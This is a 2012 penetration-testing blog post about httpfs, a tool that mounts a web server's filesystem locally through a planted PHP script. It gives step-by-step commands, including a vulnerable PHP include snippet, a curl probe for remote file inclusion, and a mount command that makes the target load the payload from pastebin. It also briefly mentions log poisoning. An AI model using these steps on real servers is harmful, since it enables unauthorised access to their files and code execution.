Penetration testing with httpfs: RFI

2012-07-27 13:59:27 » C, filesystem, fuse, hacking, lfi, linux, networking, pentesting, php, rfi, security, Weevely

As every system administrator knows, mounting remote filesystem with protocols like sshfs or smbfs saves time and simplify interactions with remote machines. This leisure is usually not available when having limited remote access, like managing a web shell or during a web application penetration testing.

If you are familiar with those situations httpfs can help you mounting locally a remote filesystem, relying on a script, like a PHP file, installed on target webserver. This FUSE filesystem written by Andrea Cardaci and me is your next indispensable tool in your toolkit.

Basic usage

Just generate server side script, in this case PHP, upload it to target machine and mount remote location locally. Let's see single steps:

  • Download httpfs archive or clone source code using github.
  • Compile and install it as written in README file.
  • Generate PHP script:
1
$ httpfs generate php > httpfs.php
  • Upload generated script to an accessible location inside the document root of target web server. In next paragraphs we will see some penetration testing techniques to run http PHP code exploiting file inclusion vulnerabilities.
  • Mount remote location locally:
1
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/
  • If you don't have enough privileges to access to system root '/', append as last parameter a remote folder to mount as basedir:
1
$ httpfs mount http://target.com/httpfs.php /tmp/httpfs/ /home/john
  • Browse your pretty awesome new mountpoint
1
2
3
4
$ cd /tmp/httpfs/
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old

Exploiting file inclusion

Remote file inclusion is a common vulnerability that force to execute malicious PHP code to a vulnerable PHP web application. A tipical exploitable PHP script contains:

1
2
3
<?php
include($_GET['page']);
?>

Let's exploit RFI to execute httpfs server side PHP code to achieve remote filesystem mounting.

  • Verify RFI vulnerability: by default PHP option "allow_url_fopen" is off to disable HTTP and FTP URL opening. In this cases try LFI attack as described at bottom. Check if include() can open thirds web resources:
1
$ curl http://target.com/fi.php?page="http://www.google.com"

By default PHP option "allow_url_fopen" is off to disable HTTP and FTP URL opening: in those cases try LFI attack as described at bottom.

  • Generate httpfs server side script as written in paragraph before.
  • Upload generated PHP script in a HTTP reachable site, as http://pastebin.com or something faster.
  • Run httpfs using as URL the location to load httpfs generated script:
1
2
$ mkdir /tmp/httpfs/
$ mount http://target.com/fi.php?page="http://pastebin.com/raw.php?i=XFYwGCK0" /tmp/httpfs/
  • Browse remote filesystem through local mount point.
1
2
3
4
$ cd /tmp/httpfs/
$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old

When an application is prone to file inclusion vulnerability but it doesn't allow to open HTTP or FTP remote URLs, is anyway possible to inject our malicious code with techniques like /proc/self/environ or log poisoning.

Httpfs will be included soon in Weevely as an automatic installation module, meanwhile enjoy this complete stand alone version.

Comments

comments powered by Disqus